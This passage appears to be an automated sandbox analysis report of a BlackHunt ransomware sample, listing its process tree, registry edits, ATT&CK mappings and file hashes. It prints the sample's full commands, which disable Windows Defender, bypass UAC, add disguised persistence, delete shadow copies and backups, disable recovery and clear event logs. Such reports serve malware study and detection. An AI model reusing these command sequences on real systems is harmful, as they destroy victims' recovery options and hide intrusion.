4912 3116 cmd.exe 133 PID 3116 wrote to memory of 4912 3116 cmd.exe 133 PID 4368 wrote to memory of 3836 4368 cmd.exe 134 PID 4368 wrote to memory of 3836 4368 cmd.exe 134 PID 880 wrote to memory of 5108 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 135 PID 880 wrote to memory of 5108 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 135 PID 880 wrote to memory of 1612 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 138 PID 880 wrote to memory of 1612 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 138 PID 2872 wrote to memory of 4520 2872 cmd.exe 137 PID 2872 wrote to memory of 4520 2872 cmd.exe 137 PID 4528 wrote to memory of 544 4528 cmd.exe 145 PID 4528 wrote to memory of 544 4528 cmd.exe 145 PID 1828 wrote to memory of 4980 1828 cmd.exe 144 PID 1828 wrote to memory of 4980 1828 cmd.exe 144 PID 880 wrote to memory of 3748 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 143 PID 880 wrote to memory of 3748 880 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe 143 PID 4088 wrote to memory of 5000 4088 cmd.exe 141 PID 4088 wrote to memory of 5000 4088 cmd.exe 141 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe"C:\Users\Admin\AppData\Local\Temp\637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:880 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:5008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:688
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:5108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe" /F2⤵PID:3428
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\637c778061d24ddeb65d5f3b19a095d06e80ccc49506f6be1e39a8da7cb9ae3a.exe" /F3⤵
- Creates scheduled task(s)
PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3180
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2692
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2452
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1484
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4776
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2188
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4876
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:560
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:964
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4188
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:6308
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:5792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:9336
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:6676
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:8312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:5480
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
PID:8804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8608
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:5336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:620
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:8936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1120
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:1164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:8852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:8728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6380
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6344
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:10076
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2040
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3620
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:6272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:6252
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:6196
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5880
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:9168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:10000
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:9044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3004
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:9096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:6256
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5152
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2268
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4260
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4132
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5492262857d106d54c22fdb9b83fda32a
SHA16129b0536e29b6867567f1b3bb46cbfc1d35dbf0
SHA256fefef41176eed9acf8d41190bdbabef902f6e0615d20146e943e74660dca05e1
SHA5121a66979c5aa8b529d4264c429a81c488fa7acf930f6b9c0704f7e01696711a244d3a56f6d31c3ff25bd3480873797ffc843e04b8a519852466bf15ed228725de
-
Filesize
12KB
MD56eb8efbbbd8ee992a7d92564a3dbb75e
SHA1095a16bd287f05bc609559e7ab3b26584787ec57
SHA256e3e53b6becde1d1ddb1ae8a2beb78a7ca9e6fbd10bfa71bf6907cfc878c972ac
SHA512078e9c3d89604f42ac6ac52ff1a244e188946f26359282b63d62a3c36ef8e114cfbe9d932a9540a08aaf8b475bf7600be08cd4c3d15fc9c6af8848cef7e1c842
-
Filesize
684B
MD5d32c79cbe1c89ebf2b5df9521422b919
SHA1b57ce77cbbb2742a5ee368ce663bde188e01396d
SHA2564f83c60c1fe6a6ef4cdea9460ee2e1a45e82555743b120a80cd81698820d933c
SHA512484c269f73d5722ed334f4853c6bccae94e38b40337d957ff7edf9f359d98b69f08054ac311db7ee4e2e4316e1deb85730b319b4c5a16eb053449840bb5f0baf